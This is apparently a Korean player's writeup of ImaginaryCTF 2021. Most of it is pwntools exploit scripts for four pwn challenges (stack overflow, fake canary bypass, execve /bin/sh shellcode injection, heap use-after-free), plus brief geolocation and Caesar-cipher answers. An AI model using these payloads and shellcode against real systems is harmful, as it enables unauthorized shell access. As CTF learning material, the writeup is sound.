2021 ImaginaryCTF writeup

Crypto나 misc 중에 프로그래밍을 이용한 문제 해결문제가 있었는데 많이 못풀었다...

100점짜리 문제들만 다 풀었어도 1000점은 넘었을텐데 아쉽다.. crypto와 misc 프로그래밍 문제를 풀면서 프로그래밍 능력 향상을 해야겠다..

PWN

stackoverflow

from pwn import *

p = remote('chal.imaginaryctf.org', 42001)

payload = ""
payload += "A"*40
payload += p64(0x69637466)

p.sendlineafter('color?\n', payload)

p.interactive()

 

fake_canary

from pwn import *

p = remote('chal.imaginaryctf.org',42002)
#p = process('./fake_canary')

win = 0x400729
payload = ""
payload += "A"*40
payload += p64(0xdeadbeef)
payload += p64(0xcafebebe)
payload += p64(win)
payload += p64(win)
p.sendlineafter('name?\n', payload)
p.interactive()

 

fast

from pwn import *

p = remote('chal.imaginaryctf.org', 42020)
size = random.randint(20,1000)
shellcode = "\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05"

payload = ""
payload += "A"*size+"B"*8+shellcode
p.sendlineafter('DATA----------------------------', payload)

p.interactive()

the_first_fit

from pwn import *

p = remote('chal.imaginaryctf.org', 42003) 

p.sendlineafter('> ', str(3))
p.sendlineafter('>> ', "/bin/sh")

p.sendlineafter('> ', str(1))
p.sendlineafter('>> ', str(1)) # malloc a

p.sendlineafter('> ', str(3))
p.sendlineafter('>> ', "/bin/sh") # input /bin/sh at a

p.sendlineafter('> ', str(2))
p.sendlineafter('>> ', str(1)) # free a

p.sendlineafter('> ', str(3))
p.sendlineafter('>> ', "/bin/sh") # input a location /bin/sh

p.sendlineafter('> ', str(1))
p.sendlineafter('>> ', str(2)) # malloc b ( same size as a, allocate a location)

p.sendlineafter('> ', str(4))

p.interactive()

MISC

사진에 나오는 가게들을 구글 지도로 검색해서 보면 됨

38.947, -119.961

 

Crypto

Chicken Caesor Salad

qkbn{ePmv_lQL_kIMamZ_kQxpMZa_oMb_aW_pIZl} 시저 암호

복호화 사이트에서 돌리면 ictf_로 시작하는 문자열이 있는데 그게 답

https://www.dcode.fr/caesar-cipher 복호화 사이트

 

 

 

Crypto나 misc 중에 프로그래밍을 이용한 문제 해결문제가 있었는데 많이 못풀었다...